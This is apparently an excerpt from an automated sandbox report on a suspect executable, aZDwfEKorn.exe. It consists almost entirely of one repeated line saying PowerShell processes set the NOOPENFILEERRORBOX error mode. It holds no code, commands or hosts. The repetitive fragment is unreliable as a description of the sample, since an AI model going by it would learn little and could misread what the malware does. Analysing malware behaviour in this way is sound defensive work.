            Source: C:\Users\user\Desktop\aZDwfEKorn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
